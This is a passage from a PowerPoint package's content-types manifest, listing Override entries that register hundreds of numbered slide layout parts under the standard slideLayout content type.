  <Override PartName="/ppt/slideLayouts/slideLayout2691.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2692.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2693.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2694.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2695.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2696.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2697.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2698.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2699.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout270.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2700.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2701.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2702.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2703.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2704.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2705.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2706.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2707.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2708.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2709.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout271.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2710.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2711.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2712.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2713.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2714.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2715.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2716.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2717.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2718.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2719.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout272.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2720.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2721.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2722.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2723.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2724.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2725.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2726.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2727.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2728.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2729.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout273.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2730.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2731.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2732.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2733.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2734.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2735.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2736.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2737.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2738.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2739.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout274.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2740.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2741.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2742.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2743.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2744.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2745.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2746.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2747.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2748.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2749.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout275.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2750.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2751.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2752.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2753.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2754.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2755.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2756.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2757.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2758.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2759.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout276.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2760.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2761.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2762.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2763.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2764.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2765.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2766.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2767.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2768.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2769.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout277.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2770.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2771.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2772.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2773.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2774.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2775.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2776.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2777.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2778.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2779.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout278.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2780.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2781.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2782.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2783.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2784.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2785.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2786.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2787.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2788.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2789.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout279.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2790.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2791.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2792.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2793.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2794.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2795.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2796.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2797.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2798.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2799.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout280.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2800.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2801.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2802.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2803.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2804.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2805.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2806.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2807.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2808.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2809.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout281.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2810.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2811.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2812.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2813.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2814.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2815.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2816.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2817.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2818.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2819.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout282.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2820.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2821.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2822.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2823.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2824.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2825.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2826.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2827.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2828.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2829.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout283.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2830.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2831.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2832.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2833.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2834.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2835.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2836.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2837.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2838.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2839.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout284.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2840.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2841.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2842.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2843.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2844.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2845.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2846.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2847.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2848.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2849.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout285.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2850.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2851.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2852.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2853.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2854.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2855.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2856.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2857.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2858.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2859.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout286.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2860.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout287.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout288.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout289.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout290.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout291.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout292.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout293.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout294.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout295.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout296.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout297.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout298.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout299.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout300.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout301.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout302.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout303.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout304.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout305.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
